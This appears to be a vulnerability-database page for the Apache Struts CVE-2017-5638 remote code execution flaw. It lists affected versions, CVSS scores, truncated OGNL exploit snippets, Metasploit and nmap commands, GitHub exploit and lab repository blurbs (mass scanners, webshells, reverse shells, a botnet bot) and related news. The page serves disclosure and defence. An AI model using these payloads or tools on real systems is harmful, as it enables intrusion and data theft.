Published: 11/03/2017 Updated: 24/02/2021

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote malicious users to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Product	Search on Vulmon	Subscribe to Product
apache struts 2.3.11
apache struts 2.3.12
apache struts 2.3.15.1
apache struts 2.3.15.2
apache struts 2.3.19
apache struts 2.3.20
apache struts 2.3.20.1
apache struts 2.3.24.1
apache struts 2.3.24.2
apache struts 2.3.29
apache struts 2.3.30
apache struts 2.3.10
apache struts 2.3.14.3
apache struts 2.3.15
apache struts 2.3.16.3
apache struts 2.3.17
apache struts 2.3.23
apache struts 2.3.24
apache struts 2.3.28
apache struts 2.3.28.1
apache struts 2.3.8
apache struts 2.3.9
apache struts 2.3.13
apache struts 2.3.14
apache struts 2.3.15.3
apache struts 2.3.16
apache struts 2.3.20.2
apache struts 2.3.20.3
apache struts 2.3.24.3
apache struts 2.3.25
apache struts 2.3.31
apache struts 2.3.5
apache struts 2.3.14.1
apache struts 2.3.14.2
apache struts 2.3.16.1
apache struts 2.3.16.2
apache struts 2.3.21
apache struts 2.3.22
apache struts 2.3.26
apache struts 2.3.27
apache struts 2.3.6
apache struts 2.3.7
apache struts 2.5.4
apache struts 2.5.6
apache struts 2.5.7
apache struts 2.5.10
apache struts 2.5.3
apache struts 2.5.5
apache struts 2.5.8
apache struts 2.5.9
apache struts 2.5
apache struts 2.5.1
apache struts 2.5.2

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value This vulnerability has been assigned CVE-ID CVE-2017-5638 This advisory is availabl ...

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')" payload += "(#dm=@ognlOgnlContext@DEFAULT_MEMBER_ACCESS)" payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['comopensymphonyxwork2Action ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update ...

Apache Struts 2 versions 23x before 2332 and 25x before 25101 remote code execution exploit that provides a reverse shell ...

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT    STATE SERVICE
80/tcp  open  http
| http-vuln-cve2017-5638:
|   VULNERABLE
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|
|     Disclosure date: 2017-03-07
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|       https://cwiki.apache.org/confluence/display/WW/S2-045
|_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
      msf exploit(struts2_content_type_ognl) > show targets
            ...targets...
      msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
      msf exploit(struts2_content_type_ognl) > show options
            ...show and set options...
      msf exploit(struts2_content_type_ognl) > exploit

This is a sample project to demonstrate the Equifax struts vulnerability and how SELinux can help First of all, Please Dont Disable SELinux! Disabling SELinux seems to be the easiest thing to do when things don't work After disabling SELinux, things begin to work However, by doing so, we lose a very powerful security tool This simple repository will demonstrate the us

Working POC for CVE 2017-5638

apache-struts-v2-CVE-2017-5638 Working POC for CVE 2017-5638 This repo contains a working python example demonstrating the RCE capabilities of CVE 2017-5638 Also for reference is included the Struts Showcase WAR file

cve-2017-5638 Vulnerable site sample

cve-2017-5638 cve-2017-5638 Vulnerable site sample This project aims to demonstrate the CVE-2017-5638 exploitation for educational purpose For more informations, see cwikiapacheorg/confluence/display/WW/S2-045 Legal Disclaimer This project is made for educational and ethical testing purposes only Attacking targets without prior mutual consent is illegal It is the e

CVE-2017-5638 This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock This is a completely harmless as it does not inject any malicious payload, only inject an HTTP header named 'STRUTS2-VALIDATION' in order to be able to validate whether is vulnerable Because of its multithread capability, it's able to run 25k+ appli

This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.

struts2_cve-2017-5638 This is a sort of Java porting of the Python exploit at: wwwexploit-dbcom/exploits/41570/ This software is written to have no external dependencies DISCLAIMER This tool is intended for security engineers and appsec guys for security assessments Please use this tool responsibly I do not take responsibility for the way in which any one uses thi

Struts-RCE CVE-2017-5638

struts-rce-cve-2017-5638 Struts-RCE CVE-2017-5638 This is a modified exploit that creates a webshell and provides a bash/cmd like interface to interact with the webshell in the console

Struts 2 web app that is vulnerable to CVE-2017-98505 and CVE-2017-5638

Vulnerable Struts2 application Requirements Maven (mavenapacheorg) Struts <= 2510 CVE-2017-5638 - Apache Struts 2 Multipart form RCE Requirements Locate a URL that issues a multipart form POST Getting Started The application / server can be started with the following maven command: mvn jetty:run Run the exploit (wwwexploit-dbcom/exploits/41570

These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638) There is a MassScanner and Exploiter, You can use scanner to Mass Scan a list of URLs and then exploit them by Exploiter The Exploiter will run arbitrary shell commands on the vulnerable server

CVE-2017-5638

Jar application to send commands to vulnerable Struts2 apps

Commandline Emulator | CVE-2017-5638 Disclaimer This is meant for educational, and research purposes only I do not authorize or endorse any illegal or unethical use of this projects contents or information Proof of concept command line emulator to deliver payloads for CVE-2017-5638 Instructions Run: java -jar Sendjar Url: localhost/Webapp/action Supports most ba

Apache Struts CVE-2017-5638 RCE exploitation

Apache Struts CVE-2017-5638 exploitation This simple web application is built with vulnerable Apache Struts 2510 (CVE-2017-5638) It’s vulnerable to RCE Starting web application To start vulnerable web application, execute: mvn jetty:run The application will be accessible on port 8012 by default You can change it: mvn -Djettyhttpport=<port&a

This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

OgnlContentTypeRejectorValva This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

Kubernetes security presentation This repository contains manifest files for a presentation about Kubernetes security held at a meetup of the "München Kubernetes/Cloud-Native Meetup" group In order to deploy the sample application: kustomize build sample-app/base | kubectl apply -f - In order to deploy the sample application with security context in place:

CVE-2017-5638 Google Dork : "site:com filetype:action"

cve-2017-5638

PoC for CVE: 2017-5638 - Apache Struts2 S2-045

CVE-2017-5638 PoC for CVE: 2017-5638 - Apache Struts2 S2-045

apache-struts2-CVE-2017-5638 Demo Application and Exploit Sample Apache Struts2 App Struts2-showcase: mvnrepositorycom/artifact/orgapachestruts/struts2-showcase/2312 Exploit Reference: githubcom/rapid7/metasploit-framework/issues/8064

detection for Apache Struts recon and compromise

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware Since we aren't blo

Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability

Strutsy Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability Includes blind and time based code injection techniques which significantly reduces false negatives Other features include mass URL imports to scan multiple targets in one go Usage: python strutsypy urlstxt windows/linux/default ip-address All parameters are required urlstxt - file contai

Example PHP Exploiter for CVE-2017-5638

CVE-2017-5638 Apache Struts2 Example PoC Exploit PHP Code for CVE-2017-5638 Usage php exploitphp "127001:8080/example/indexaction" "command" ** USE AT YOUR OWN RISK**

CVE-2017-5638 Converted to Python3 Original: wwwexploit-dbcom/exploits/41570

CVE-2017-5638 Google Dork : "site:com filetype:action"

CVE-2017-5638

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 A realistic scenario where a reference project for a framework is deployed on a container but with terrible consequences To familiarise yourself look at the code and compile it Also investigate the dockerfile - does anything specific rise to get our attention? Shows

struts2-showcase Struts Showcase Application source code packaged in version 2320 Exploits converted to Python3 from immunio/apache-struts2-CVE-2017-5638 Setup for Intellij Download IntelliJ community Import from VCS File > Project Structure > Project SDK > JDK 18 Install JDK 8 if it does not exist View > Maven > Toggle 'Skip Tes

WAF - Getting started with WAF, Bot Detection and Threat Campaigns Original Lab Guide This class will focus on a best practice approach to getting started with F5 WAF and application security This introductory class will give you guidance on deploying WAF services in a successive fashion This 141 class focuses entirely on the negative security model aspects of WAF configurati

Overview Git repository for grey hat hacking talk Agenda What is a hacker What is grey hat hacking Why is it important (survey of fortune 500 companies) Talk about equifax hack link Run the equifax hack Show them the code Walk though what it does Run the exploit against a server Show the results Decode the passwords Talk about how it was executed and the fallout for equifax

Demo Application and Exploit

(m4ud) Apache Struts S2-045-RCE CVE-2017-5638 NT: Uses msfvenom create payloads based on chosen OS, or you use only the -c flag to issue commands without lhost, lport, and osys! Options: -h, --help show this help message and exit -p RPORT, --port=RPORT RPORT, -t TARGET, --target=TARGET Vulnerable Target, -d

This tool uses an exploit in the Apache Struts framework called CVE-2017-5638 to gain access to a vunerable server through an OGNL injection It can be downloaded here (you will need to run it from the command line) Usage: struts_hack [target IP] [target port]

CVE-2017-5638 strutsapacheorg/docs/s2-016html cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017 Metasploit Framework Exploit Module for Apache Struts Content-Type exploit Have not tested against a windows server but tested against a linux server using the payload of generic/shell_bind_tcp

Golang exploit for CVE-2017-5638

POC Exploit for CVE-2017-5638 Only use this exploit on systems you own or have explicit rights to test Installation If you have go already installed on your computer, go get is the way to go go get githubcom/Greynad/struts2-jakarta-inject Usage Single command execution struts2-jakarta-inject -u <url> -c 'id' Pseudo interactive shell struts2-jakarta-inje

Apache Struts (CVE-2017-5638) Shell

StrutsShell Apache Struts (CVE-2017-5638) Shell Introduction The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective metasploit module for this vulnerability did not w

struts2-showcase Struts Showcase Application source code packaged in version 2320 archiveapacheorg/dist/struts/2320/ Exploits converted to Python3 from githubcom/immunio/apache-struts2-CVE-2017-5638 Example exploit on Windows: python exploit3py dir

These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)

vulnerability_struts-2331 Build the struts-2331 (CVE-2017-5638) environment

Container Security Demo Documentation Welcome to the Container Security Demo Documentation This package contains all required files to demo Cloud One - Container Security from zero to hero, even if you don't have a Kubernetes cluster Requirements Cloud One Account - Any region will do - cloudonetrendmicrocom Cloud One API Key - cloudonetrendmicrocom/

THIS IS UNDER CONSTRUCTION Welcome to the F5 Advanced Web Application Firewall lab guide This series of lab exercises is intended to explain and demonstrate key features of F5 Advanced Web Application Firewall The Blueprint which we use as base for all upcoming Modules is called Advanced WAF Demo v16 + LCC, ML and Device ID+ The intend is to provide demos on the following con

SlicePathURL Usage • Installation - Installation & Requirements: > go install githubcom/erickfernandox/slicepathurl@latest OR > git clone githubcom/erickfernandox/slicepathurlgit > cd slicepathurl > go build slicepathurlgo > chmod +x slicepathurl > /slicepathurl -h

inc: 7 Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 A realistic scenario where a reference project for a framework is deployed on a container but with terrible consequences To familiarise yourself look at the code and compile it Also investigate the dockerfile - does anything specific rise to get our attention?

cve-2017-5638 참고_1 참고_2 참고_3 참고_4

Apache-Struts-2-CVE-2017-5638-Exploit This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the apache server How to use: $ sudo python Struts2py ******************************************* * [!] Exploit Apache Struts2 {*}DEMO * ******************************************* Code

An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638

A Vulnerable Apache Struts Application Confirmed Vulnerabilities CVE Description URL 2017-5638 Remote Command Vulnerability in Apache Struts cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-5638 Requirements: Vagrant VirtualBox SearchSploit (Optional) Setup $ git clone githubcom/evolvesecurity/vuln-struts2-vmgit $ cd vuln-struts2-vm Build Virtual M

(CVE-2017-5638) XworkStruts RCE Vuln test script

XworkStruts-RCE (CVE-2017-5638) XworkStruts RCE Vuln test script Usage> python XworkStruts RCE (CVE-2017-5638)py <dst_ip> <dst_port> Script based on Python2 Just using Vuln Test for your System

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - githubcom/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file githubcom/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrcepy --target=localhost:8080/struts2_23151-showcase/showcaseaction --ip=127001 --

CVE-2017-5638 (PoC Exploits)

CVE-2017-5638 CVE-2017-5638 (PoC Exploits)

A S2-045 remote command execution script, semi-interactive shell

S2-045 RCE Usage：python CVE-2017-5638-S2-045py url 脚本功能仅限命令执行，while死循环解决了多次命令执行的交互方式

CVE-2017-5638 - Exploit

S2-045 CVE-2017-5638 Exploit 修复方案检测方式查看web目录下/WEB-INF/lib/目录下的struts-corexxjar ，如果这个版本在Struts235 到 Struts2331 以及 Struts25 到 Struts2510之间则存在漏洞，更新至Strusts2332或者Strusts25101，或使用第三方的防护设备进行防护。

ExploitDev Journey #10 | CVE-2017-5638 | Apache Struts 235 < 2331 / 25 < 2510 - Remote Code Execution Original Exploit: wwwexploit-dbcom/exploits/41570 Exploit name: Apache Struts RCE CVE: 2017-5638 Lab: Stratosphere - HackTheBox Description There is a vulnerability in Apache struts that allows a remote attacker to execute code and system comma

2017 Equifax data breach Contents Some important information What kinds of data were accessed? How was the data breached? The US says members of the Chinese military hacked Equifax The US indictment DOJ evidence that China's military personnel are behind the Equifax data breach Weak evidence How the hackers were able to hide their tracks Other interesting information L

Struts02 s2-045 exploit program

CVE-2017-5638 | Struts s2-045 Description It is possible to perform a RCE attack with a malicious Content-Type value If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user Affected versions Struts 235 Struts 2331 Struts 25 Struts 2510 Exploitation Remediation To remediate this issue, update the affec

网安人员必读必会 OWASP 2021 Messages 书籍推荐《白帽子讲web安全》《sqlmap从入门到进阶》《WireShark抓包分析》 A01:2021-Broken Access Control 失效的访问控制从第五位上升；94% 的应用程序都经过了某种形式的破坏访问控制的测试。映射到 Broken Access Control 的 34 个 CWE 在应用程序中出现的次数比任�

h2_Goat Security Misconfiguration Overview of the study This category represents the fifth most common security vulnerability according to the OWASP Top 10 critical security of 2021 90% of the applications were tested From this test, 451% crash rate and more than 280 K CWE was found for this category Among the security vulnerabilities identified by the CWE, the CWE-16 and

SlicePathsURL Usage • Installation • Why use SlicePathsURL? • How does SlicePathsURL work? SlicePathsURL slices a URL into directory levels to complement tools like Nuclei in searching for vulnerabilities in directories beyond the root of the URL - Installation & Requirements: go install githubcom/erickfernandox/slicepathsurl@latest

Working Python test and PoC for CVE-2018-11776, includes Docker lab

CVE-2018-11776-Python-PoC hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter Working Python test and PoC for CVE-2018-11776, originally appearing on; githubcom/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request Versions affected are 2

Struts2 S2-045（CVE-2017-5638）Exp with GUI

#Struts2 S2-045 (CVE-2017-5638) Exp Tools #Exp Function: Command Execute Get Target Website's Physical Path File Upload Getshell Default Webshell For Chopper Support HTTP/HTTPS Support URL With Any Port Note: Default Webshell's Password is s2045@exp #Notice The Project Is Intended For Educational/Research Purposes Mail: flyteas@gmailcom

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run /mvnw clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack a If 8080 is in use, map to an open port eg -p 8888:8080 once container com

Exploitable target to CVE-2017-5638

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)

strutszeiro Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) #Dependencies pip install -r requerimentstxt #Config Create a telegram bot, save the API token in config/tokenconf Create a telegram group, save the group id in config/groupconf #Start python strutszeiropy #Telegram Usage /add url - test vulnerability and add the new server /exploit

CVE-2017-5638 Table of Contents Overview Dependencies Usage Overview This project is a prove-of-concept for the Apache Struts vulnerabilty The goal was to create software that can generate and test random IPs for the vulnerabilty described above Use this project on your own risk and for educational purpose only Dependencies cURL cURL is used to send the crafted header t

test struts2 vulnerability CVE-2017-5638 in Mac OS X

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X test struts2 vulnerability CVE-2017-5638 in Mac OS X ###download test web app and run it in tomcat #install tomcat brew install tomcat #confirm where the tomcat installed ls -lF `which catalina` #confirm tomcat home dir ls -lF /usr/local/Cellar/tomcat/8511/libexec #create web app "struts2" in webapps of tomcat

CVE: 2017-5638 in different formats

CVE-2017-5638 CVE: 2017-5638 in different formats Most of them will require you to enter the url and you might want to change the command Please issue pull requests if you can make it so you can enter a url and command! PHP - Example localhost/2017-5638php?url=TARGET&cmd=command XMLHttpRequest - CVE-2017-5638js -- will require Access-Control-Allow-Origin on tar

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

CVE-2017-5638 PoC Code in Python | DORK: ext:action Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action USAGE: python strutspy victimsite dir The initial Python Script that was Posted didn't correctly format the Content-Type Header I recoded the Content Type Header to properly format Content-Type:%20{Exploit} I also added a logging and

Demo app of THAT data broker's security breach

CVE-2017-5638 Demo app of, yes, that data broker's security breach Includes exploit code Basic usage (launch) mvn jetty:run Then go to localhost:8080/basic-struts/indexaction You should see the Welcome to Struts 2! message Vulnerability scan mvn site Acknowledgements Exploit code adapted from immunio's repo

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

How to Demo Container Security This is a how to demo guide for Cloud One Container Security, where we'll be able to see in-action the power of Runtime Scanning and Runtime Security working together to provide visibility and control over your cluster, including some shortcuts to deploy your own EKS cluster and Calico Good to Know This demo is targeted to give a better unde

PII Leak Prevention Guide How to identify & prevent PII leaks -- learnings from 25+ major data breaches Today, personally identifiable information (PII) faces a wide variety of threats In order to secure PII from leakage and exposure, organizations need to understand the nature of these threats as well as the tools they have at their disposal to ensure that their data

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

DevSecOps Pipeline Demo

DevSecOps Pipeline Demo Requirements This demo uses Virtual box to deploy a local GitLab instance and configure it to run a DevSecOps Pipeline demo This demonstrates a DevSecOps Pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach Pre-requisites VirtualBox Vagrant Python You will also need the Vagrant Host

This is the Apache Struts CVE-2017-5638 struts 2 vulnerability. The same CVE that resulted in the equifax database breach.

Common-Vulnerability-and-Exploit-5638 This is the Apache Struts CVE-2017-5638 struts 2 vulnerability The same CVE that resulted in the equifax database breach A write up on how to apply, and patch against this exploit

Install anchor-engine withhelm helm install anchore -f anchore_valuesyaml anchore/anchore-engine Configure anchore-cli ANCHORE_CLI_USER=admin ANCHORE_CLI_PASS=$(kubectl get secret --namespace default anchore-anchore-engine-admin-pass -o jsonpath="{dataANCHORE_ADMIN_PASSWORD}" | base64 --decode; echo) ANCHORE_CLI_URL=http:/

Check for Struts Vulnerability CVE-2017-5638

strutser This program checks for CVE-2017-5638 Usage Usage of /strutser: Usage of /strutser: -c, --concurrency int Concurrent HTTP requests (default 10) -f, --file string File containing targets -p, --ports intSlice Ports to check (default [80]) -t, --timeout int Timeout on HTTP requests (default 15) Tips For multiple ports, use the --ports argum

An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

Stutsfi An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

Sonatype Platform Demo (JAVA) ###Exploit Demo for CVE-2017-5638 Based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Demo-able Features: Java Application Struts2 2510 as vulnerable Ahab: Configuration of Ahab in the Dockerfile IDE Integration Breaking Changes Transitive Solver IaC Pack: awslargetfplan included Azure DevOps: azure-pipelinesyml

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have docker, and a jre installed fork this repo run /mvnw clean package in project root run docker build -t hack run docker run -d -p 9080:8080 hack once container comes online - verify by running in browser localhost:9080 To begin te

(CVE-2017-5638) XworkStruts RCE Vuln test script

XworkStruts-RCE (CVE-2017-5638) XworkStruts RCE Vuln test script Usage> python XworkStruts RCE (CVE-2017-5638)py <dst_ip> <dst_port> Script based on Python2 Not For attack just using Vuln Test for your System

st2-046-poc CVE-2017-5638

#Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638 Struts2 Security Bulletin S2-046 A null byte (\x00) in a request¡¯s Content-Disposition header filename field can trigger a InvalidFileNameException with the same (client controlled) filename string in the exception message that be used can trigger OGNL evaluation during error handling Note tha

ECE 9069 Hacking Companion Notes on Apache Struts CVE-2017-5638 Source Background Equifax Data Breach Between May and July 2017, massive data breach affecting over 140 million users Stolen files contain critical personal information, credit card number, SIN, driver's license numbers Equifax paid up to $ 575 million Caused by 0-day attack on Apache Struts CVE-2017-

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

Beapy: Cryptojacking Worm Hits Enterprises in China

Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2023

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 20196 Min ReadThreat Intelligence SubscribeFollowtwitterfacebooklinkedinBeapy: Cryptojacking Worm Hits Enterprises in ChinaCryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

BleepingComputer • Ax Sharma • 13 Apr 2022

Apache has fixed a critical vulnerability in its vastly popular Struts project that was previously believed to have been resolved but, as it turns out, wasn't fully remedied.
As such, Cybersecurity and Infrastructure Security Agency (CISA) is urging users and administrators to upgrade to the latest, patched Struts 2 versions.
Struts is an open-source application development framework used by Java web developers for building model–view–controller (MVC) apps.
T...

Threatpost • Lindsey O'Donnell • 06 Nov 2020

Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).
Of note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available – leading researchers to call it “Gitpaste-12.” It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.
“No malware is good to have, but worms are particu...

Threatpost • Tom Spring • 14 Aug 2020

Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.
The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as CVE-2019-0230 and CVE-2019-0233. Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts ...

The Register • Shaun Nichols in San Francisco • 14 May 2020

Update, update, update. Plus: Flash, Struts, Drupal also make appearances Sadly, 111 in this story isn't binary. It's decimal. It's the number of security fixes emitted by Microsoft this week

Vulnerabilities in Microsoft Windows, Office, and Windows Server, for which patches have been available for years, continue to be the favorite target for hackers looking to spread malware.
A list posted by US-CERT this week rattles off the 10 most oft-targeted security vulnerabilities during the past three years, and finds that, shock horror, for the most part, keeping up with patching will keep you safe.
Microsoft ranks highly in the list because its software is widely used, and pro...

Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Threatpost • Lindsey O'Donnell • 22 Jul 2019

Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.
The consumer credit reporting agency on Monday said it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover ...

BleepingComputer • Ionut Ilascu • 11 Sep 2018

Mirai and Gafgyt, two of the best known IoT botnets, have forked once again, with the new variants peeking at the enterprise sector for creating or replenishing their denial-of-service resources for distributed attacks.
The code for both malware pieces reached the public space a few years back and aspiring cybercriminals began spawning their own revisions.
Most of the times there is nothing interesting about the mutations, but the latest alternatives show a predilection for business ...

The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear Apache's latest SNAFU – Struts normal, all fscked up: Web app framework needs urgent patching Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too

Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign —which they dubbed
— uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excellen...

Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

BleepingComputer • Catalin Cimpanu • 25 Jan 2018

Malware that secretly mines Monero is becoming a real problem in the real world, with the number of different incidents growing with each week. For example, only this past week, three new attacks came to light.
The reason is simple and is the same one given by all security experts who paid close attention to the cryptocurrency market in the past year.
The number of malware campaigns spreading Monero-mining threats grew exponentially with Monero's trading price. As the price rose, the...

BleepingComputer • Catalin Cimpanu • 16 Dec 2017

An aggressive and sophisticated malware campaign is currently underway, targeting Linux and Windows servers with an assortment of exploits with the goal of installing malware that mines the Monero cryptocurrency.
The campaign was detected by security researchers from F5 Networks, who named it
, after zealot.zip, one of the files dropped on targeted servers.
According to Maxim Zavodchik and Liron Segal, two security researchers for F5 Networks, the attackers are scanning the In...

The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

Threatpost • Tom Spring • 17 Oct 2017

